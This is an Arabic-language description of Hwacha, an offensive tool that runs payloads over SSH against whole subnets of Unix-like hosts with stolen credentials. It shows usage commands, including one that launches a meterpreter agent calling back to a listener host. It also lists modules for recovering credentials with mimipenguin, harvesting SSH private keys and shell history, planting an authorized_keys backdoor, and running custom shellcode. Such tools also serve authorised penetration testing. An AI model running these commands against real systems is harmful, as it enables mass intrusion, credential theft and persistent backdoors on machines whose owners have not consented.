
نشر الحمولات إلى أنظمة *Nix بشكل جماعي

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha هي أداة لتنفيذ الحمولات بسرعة على الأنظمة القائمة على *Nix. يمكنك بسهولة جمع القطع الأثرية أو تنفيذ شيل كود على شبكة فرعية كاملة من الأنظمة التي تم الحصول على بيانات الاعتماد الخاصة بها.
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
لتشغيل الأوامر، استخدم -x [COMMAND]
لتشغيل الوحدات، استخدم -m [MODULE]
لتحديد خيارات الوحدة، استخدم -o [ARG=ARG ARG=ARG]
لعرض جميع الوحدات المتاحة، استخدم -L
مثال استخدام:
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
الوحدات المتاحة:
[*] meterpreter استخدم هذه الوحدة لتنفيذ وكيل meterpreter على الهدف/الأهداف.
الوسائط المطلوبة: LHOST , LPORT
الوسائط الاختيارية: TYPE {python, php, 32, 64, osx}
[*] mimipenguin استخدم هذه الوحدة لتنفيذ mimipenguin على الهدف/الأهداف لاستعادة بيانات الاعتماد. (يتطلب صلاحيات root)
الوسائط الاختيارية: LISTEN
[*] keys استخدم هذه الوحدة لجمع مفاتيح SSH الخاصة من الهدف/الأهداف.
[*] history استخدم هذه الوحدة لجمع ملفات تاريخ الصدفة من الهدف/الأهداف.
[*] privs استخدم هذه الوحدة لسرد صلاحيات sudo على الهدف/الأهداف.
[*] backdoor ينشئ زوج مفاتيح RSA ويضيف المفتاح العمومي إلى ملف authorized_keys على الهدف/الأهداف.
[*] web_delivery استخدم هذه الوحدة لتنفيذ سكريبت بايثون على الهدف/الأهداف.
الوسائط المطلوبة: PATH
الوسائط الاختيارية: LISTEN
[*] custom_bin استخدم هذه الوحدة لتنفيذ ملف ثنائي مخصص على الهدف/الأهداف.
الوسائط المطلوبة: PATH
[*] sudo_exec استخدم هذه الوحدة لتنفيذ ملف ثنائي مخصص (مع sudo) على الهدف/الأهداف.
الوسائط المطلوبة: PATH
[*] shellcode استخدم هذه الوحدة لتنفيذ شيل كود مخصص على الهدف/الأهداف.
الوسائط المطلوبة: PATH
يتطلب paramiko:
pip install paramiko